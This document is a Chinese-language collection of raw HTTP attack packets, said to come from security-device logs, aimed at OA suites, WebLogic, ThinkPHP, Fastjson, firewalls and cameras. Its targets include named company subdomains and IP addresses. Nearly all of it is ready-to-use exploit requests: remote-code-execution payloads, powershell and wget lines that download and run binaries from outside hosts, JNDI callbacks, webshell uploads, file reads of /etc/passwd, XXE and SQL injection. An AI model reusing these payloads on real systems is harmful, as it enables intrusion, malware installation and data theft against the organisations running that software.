以下所有内容都是在各种安全设备的后台记录到的数据包(不含敏感信息,实际也是攻击失败的),后面的部分留空表示会继续更新 (也可能不会再更新)
=============================================================
蓝凌前台代码执行漏洞,该漏洞是未公开漏洞(S3100028163)
POST /data/sys-common/treexml.tmpl HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)
Host:vpn.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:168
s_bean=ruleFormulaValidate&script=try {String cmd = "ping www.baidu.com";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}
=============================================================
FastJson 漏洞利用
POST / HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:application/json; charset=utf-8
Content-Length:115
{
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
"resourceName":"rmi://qNWA2Gls.dflqxk.ceye.io/Exploit"
}
===============================================================
fastjson(S2019010052)
POST / HTTP/1.1
User-Agent:Mozilla/5.0 (Windows NT 6.1; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Type:application/json; charset=utf-8
Content-Length:258
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://5ltnibIi.dflqxk.ceye.io/Exploit",
"autoCommit":true
}
}
==============================================================
亿邮eyou 远程代码执行(S3000009837)
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Host:test.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:25
type='|cat /etc/passwd||'
==============================================================
齐治堡垒机SQL注入漏洞
GET /audit/gui_detail_view.php?token=1&id=\&uid=,chr(97)) or 1: print chr(121)+chr(101)+chr(115)
#&login=shterm HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
泛微OA E-cology 文件上传 (/page/exportImport/uploadOperation.jsp)(S3100023488)
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Content-Length:288
--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="pwue.jsp"
Content-Type: application/octet-stream
<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--
==============================================================
泛微OA9 前台任意文件上传(S3000009793)
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Content-Length:288
--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="pwue.jsp"
Content-Type: application/octet-stream
<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--
==============================================================
通达OA v11.7 auth_mobi.php任意用户登录漏洞(S3100028588)
GET /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
通达OA文件包含(S2020010015)
POST /ispirit/interface/gateway.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:43
json={"url":"/general/../../mysql5/my.ini"}
==============================================================
通达OA办公系统 report_bi.func.php 文件 dataset_id 参数 SQL注入漏洞(S3100023434)
POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:113
_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
==============================================================
ThinkCMF 任意内容包含漏洞(S2020091501)
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
Host:202.96.191.173:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type:application/json
Accept-Encoding:gzip
Connection:close
==============================================================
用友 GRP-u8 SQL 注入, 可执行命令(S3000009903)
POST /Proxy HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:348
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
==============================================================
锐捷 EWEB 远程代码执行(S2120090999)
POST /guest_auth/guestIsUp.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:63
mac=1&ip=127.0.0.1|echo 'wkuqchdkhiuasborjbtn' > rqoojwfuwo.txt
==============================================================
Coremail爆出漏洞可以直接读取配置(S2019010019)
GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:preview.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
ShopXO 任意文件读取漏洞(CNVD-2021-15822)(S3100024378)
GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)
Host:preview.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
Zyxel防火墙命令注入漏洞(CVE-2022-30525)(S3100024936)
POST /ztp/cgi-bin/handler HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:vpn.dongfeng-nissan.com.cn
Content-Type:application/json
Content-Length:142
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl http://Z2i9EVbB.dflqxk.ceye.io;","data":"hi"}
==============================================================
Weblogic漏洞利用或扫描(D11236926c9)
GET /_async/AsyncResponseService HTTP/1.1
Host:erp-ct.dfsouth.com
User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept:*/*
Connection:keep-alive
==============================================================
Dynamicweb云电子商务系统未授权添加用户漏洞(CVE-2022-25369)
GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:vpn.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
ThinkPHP 5.x 远程代码执行(S2020091901)
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
Host:202.96.191.161:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Encoding:gzip
Connection:close
==============================================================
Apache HTTP Server 远程命令执行(CVE-2021-41773)(S3000010931)
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host:202.96.191.161:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length:33
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip
Connection:close
==============================================================
XML外部实体注入(D111751fdae)
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host:58.248.167.75:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length:314
Content-Type:application/xml
Accept-Encoding:gzip
Connection:close
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
==============================================================
WebLogic反序列化远程代码执行漏洞(CVE-2019-2725)(S2020041008)
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.232:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
cmd:powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe');start %SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe
Content-Length:206204
Host:202.96.191.232:7001
<?xml version="1.0" encoding="utf-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="5010"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void>
--------------------------------------------------------------------------------------------------------
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:913
Host:202.96.191.185:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
----------------------------------------------------------------------------------
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:915
Host:202.96.191.185:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe');start %SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
==============================================================
WebLogic 权限绕过(CVE-2020-14883)(S2020102903)
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host:210.21.81.137:7001
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection:close
Content-Length:157
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip
_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://178.20.40.200/wbw.xml")
==============================================================
WebLogic反序列化远程代码执行漏洞(CVE-2017-10271)(S3000008711)
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:913
Host:202.96.191.185:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
==============================================================
使用CVE-2021-36260漏洞对海康威视发起攻击尝试(S3000011160)
PUT /SDK/webLanguage HTTP/1.1
Host:202.96.191.232:81
User-Agent:Go-http-client/1.1
Content-Length:102
Accept:*/*
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,sv;q=0.8
Content-Type:application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With:XMLHttpRequest
<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp/ && cd /var/tmp/ && cd /var/run/)</language>
==============================================================
ThinkPHP 远程代码执行(S2020060403)
GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
Connection:Keep-Alive
Accept:*/*
Accept-Language:zh-cn
Referer:http://210.21.81.157:8087/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:210.21.81.157:8087
==============================================================
Elasticsearch未授权访问(S3100024705)
GET /_cat/indices?format=json&h=index HTTP/1.1
Host:202.96.191.232:9200
Accept:*/*
Accept-Encoding:gzip, deflate, br
Connection:keep-alive
User-Agent:python-httpx/0.21.1
==============================================================
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API 远程命令执行(S3100024329)
POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding:identity
Content-Length:644
Accept-Language:en-us
Host:202.96.191.232:90
Accept:*/*
User-Agent:Mozila/5.0
Connection:close
Cache-Control:max-age=0
Content-Type:text/xml
Authorization:Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=
<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>
==============================================================
XXL-JOB未授权远程代码执行漏洞(S3100023062)
POST /run HTTP/1.1
Host:202.96.191.232:9999
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Content-Length:334
Accept:*/*
Accept-Language:en-US,en;q=0.5
Connection:close
Content-Type:application/json
Accept-Encoding:gzip
Connection:close
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "calc",
"glueUpdatetime": 1658940033024,
"broadcastIndex": 0,
"broadcastTotal": 0
}
==============================================================
中远麒麟 iAudit堡垒机 远程命令执行漏洞(get_luser_by_sshport.php)(S3100023318)
GET /get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20md5(ocuswpeelc);unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/ocuswpeelc.php;&clientport=1 HTTP/1.1
Host:210.21.81.165
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip
==============================================================
奇安信NS-NGFW网康防火墙前台远程代码执行(S3000009856)
POST /directdata/direct/router HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Content-Length:200
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(tcynfdguxq);unlink(__FILE__);?>' >/var/www/html/tcynfdguxq.php"]}],"type":"rpc","tid":17}
==============================================================
Jenkins远程代码执行(CVE-2019-1003000)(S2020070703)
GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27sqqx%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip
==============================================================
检测到针对用友U8 OA test.jsp的SQL注入漏洞攻击(S3000009930)
GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(204218669)) HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip
==============================================================
用友时空KSOA软件前台文件上传漏洞,该漏洞是未公开漏洞(S3100028170)
POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=9693326082.jsp HTTP/1.1
Host:mam.dongfeng-nissan.com.cn
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length:171
Accept:*/*
Connection:close
<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("OTY5MzMyNjA4Mg=="))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
==============================================================
用友NC 文件上传漏洞,该漏洞在检测发布时处于0day状态,未找到对应补丁。(S3100029010)
POST /aim/equipmap/accept.jsp HTTP/1.1
Host:202.96.191.196
User-Agent:python-requests/2.28.0
Accept-Encoding:gzip, deflate
Accept:*/*
Connection:keep-alive
Content-Type:multipart/form-data; boundary=---------------------------16314487820932200903769468567
Content-Length:535
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="222222.txt"
Content-Type: text/plain
<%out.println("bea86d66a5278f9e6fa1112d2e2fcebf");%>
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"
\webapps
c_web80900fd668c51631353aca37fc1f829.jsp
-----------------------------16314487820932200903769468567--
==============================================================
泛微E-office do_excel.php任意文件写入漏洞
poc
POST /www/general/charge/charge_list/do_excel.php HTTP/1.1
Host:xxx.com
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length:34
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type:application/x-www-form-urlencoded
Referer:http://www.baidu.com/
Accept-Encoding:gzip
html=<?php system($_POST[pass]);?>
==============================================================
泛微E-cology文件上传漏洞
影响产品:8.0/9.0 10.47以下和其他版本
利用状态:在野利用
背景描述:泛微E-cology文件上传漏洞。
漏洞详情:先发包上传
POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: target
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843
Accept-Encoding:gzip
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
Content-Length: 437
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="secId"
Content-Type: text/plain
1
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="Filedata"; filename="log.txt"
success
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="plandetailid"
1
-----------------------------34533880461293314163770424843--
将文件释放至跟网站根路径下 在数据包中将 fileid 替换
POST /OfficeServer HTTP/1.1
Host: target
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843
Accept-Encoding:gzip
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
Content-Length: 437
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="success"
{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'1015543'}
-----------------------------34533880461293314163770424843--
==============================================================
(疑似0day)用友NC 6.5文件上传漏洞,该漏洞在检测发布时处于0day状态,未找到对应补丁。(S3100029005)
POST /uapim/upload/grouptemplet?groupid=2&fileType=jsp HTTP/1.1
Host:202.96.191.196
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding:gzip, deflate
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Length:304
------WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Disposition: form-data; name="upload"; filename="whoami.jsp"
Content-Type: application/octet-stream
TEST123
------WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Disposition: form-data; name="submit"
submit
------WebKitFormBoundarymMgLJdk18SQHBnpj--